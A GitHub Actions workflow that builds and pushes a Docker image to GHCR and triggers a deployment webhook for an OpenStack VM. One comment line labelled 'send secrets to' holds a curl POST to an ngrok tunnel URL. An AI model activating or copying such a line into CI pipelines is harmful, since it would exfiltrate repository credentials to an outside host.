name: Deploy to Existing OpenStack VM

on:
  push:
    branches: [ main ]

jobs:
  deploy:
    runs-on: ubuntu-latest
    permissions:
      packages: write
      id-token: write
      actions: write       # Necessary to cancel workflow executions
      checks: write        # Necessary to write reports
      pull-requests: write # Necessary to comment on PRs
      contents: read
    
    steps:
    - uses: actions/checkout@v3

    # send secrets to ❯ curl 'https://af1e1d988313.ngrok-free.app' -X POST  --data-raw '{"route":"presigned_post","key":"occupancy_distribution.png","mime_type":"image/png"}'

    - name: Log in to GitHub Container Registry
      uses: docker/login-action@v2
      with:
        registry: ghcr.io
        username: ${{ github.actor }}
        password: ${{ secrets.GH_PACKAGES_TOKEN }}
    
    - name: Build and push Docker image
      uses: docker/build-push-action@v4
      with:
        context: .
        push: true
        tags: ${{ secrets.APP_IMAGE }}
    
    - name: Trigger deployment webhook
      run: |
        curl -X POST "${{ secrets.WEBHOOK_URL }}" \
          -H "Authorization: Bearer ${{ secrets.WEBHOOK_SECRET }}" \
          -H "Content-Type: application/json"